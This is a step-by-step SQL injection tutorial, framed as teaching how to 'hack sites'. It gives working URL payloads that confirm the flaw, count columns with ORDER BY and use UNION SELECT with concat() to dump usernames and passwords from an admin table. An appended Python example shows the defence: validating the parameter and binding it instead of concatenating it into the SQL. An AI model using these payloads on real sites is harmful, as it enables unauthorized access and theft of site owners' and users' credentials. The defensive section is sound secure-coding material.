Now we are going to learn how to hack sites that are vulnerable to SQL injection. So let's begin.


To check if the site is vulnerable to SQL injection, first check whether the URL looks like this




To check for the vulnerability, type an apostrophe at the end of the URL so it becomes like this




On hitting enter, if you see this text on the page


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc.


then the website is vulnerable to this attack.






To find the number of columns, we use the ORDER BY clause (it tells the database how to order the result). We increment the column number until we get an error.


http://www.site.com/news.php?id=7 order by 1 -- no error


http://www.site.com/news.php?id=7 order by 2 -- no error


http://www.site.com/news.php?id=7 order by 3 -- error


So the query has 2 columns, because we got an error on the 3rd one.







Our next step is to check for the UNION function, because with UNION we can select more data in a single statement.


http://www.site.com/news.php?id=7 union all select 1,2


We go up to 2 because we discovered that the number of columns was 2, so let's move on.


If we see some numbers on screen, i.e. 1 or 2, that means the UNION works.







This is for MySQL versions below 5.

http://www.site.com/news.php?id=7 union all select 1,2,3 from admin


We see the number 2 on the screen like before. Now we know that the table admin exists. To check column names, we craft a query

http://www.site.com/news.php?id=7 union all select 1,2,username from admin


We get the username displayed on screen.

Now to check for the column password

http://www.site.com/news.php?id=7 union all select 1,2,password from admin


If we are successful, we will see the password on the screen. It can be in plain text or a hash, depending on how the database has been set up. Now we must complete the query. For that we can use the concat() function (it joins strings).

http://www.site.com/news.php?id=7 union all select 1,2,concat(username,0x3a,password)from admin

Note that we put 0x3a, which is the hex value for a colon (:).


Now we get username:password displayed on screen.
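
The apostrophe, ORDER BY and UNION probes above only do anything because the id value is pasted straight into the SQL text. As an added example (not code from the original page), here is that weak query construction beside a validated, parameterized form, run against the page's own probe strings. It assumes Python's sqlite3 in place of PHP/MySQL so it runs offline; the table contents and function names are constructed for illustration.

```python
import sqlite3

# Probe values taken from the page's URLs (the part after "id=").
PROBES = ["7", "7'", "7 order by 2", "7 order by 3", "7 union all select 1,2"]

def make_db():
    # Constructed sample data; a two-column news query like the page's example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (7, 'Title seven', 'Body seven')")
    return db

def news_vulnerable(db, raw_id):
    # Weak form: the parameter is concatenated into the SQL text, so whatever
    # follows the number (a quote, ORDER BY, UNION) is parsed as SQL.
    return db.execute("SELECT title, body FROM news WHERE id = " + raw_id).fetchall()

def news_hardened(db, raw_id):
    # Corrected form: accept only a short run of ASCII digits, then bind the
    # value as a parameter so the statement text never changes with user input.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None
    return db.execute("SELECT title, body FROM news WHERE id = ?",
                      (int(raw_id),)).fetchall()

def outcome(handler, db, raw_id):
    # Classify what a page built on this handler would end up doing.
    try:
        rows = handler(db, raw_id)
    except sqlite3.Error:
        return "sql-error"  # the database error the page tells you to look for
    return "rejected" if rows is None else rows

def compare():
    # Run every probe through both handlers: {probe: (vulnerable, hardened)}.
    db = make_db()
    return {p: (outcome(news_vulnerable, db, p), outcome(news_hardened, db, p))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, fixed) in compare().items():
        print(f"{probe!r:28} vulnerable={weak!r}  hardened={fixed!r}")
```

With the hardened handler, only the plain `7` reaches the database; every other probe is rejected before a statement is built, so there is no SQL error to display and no UNION row to render.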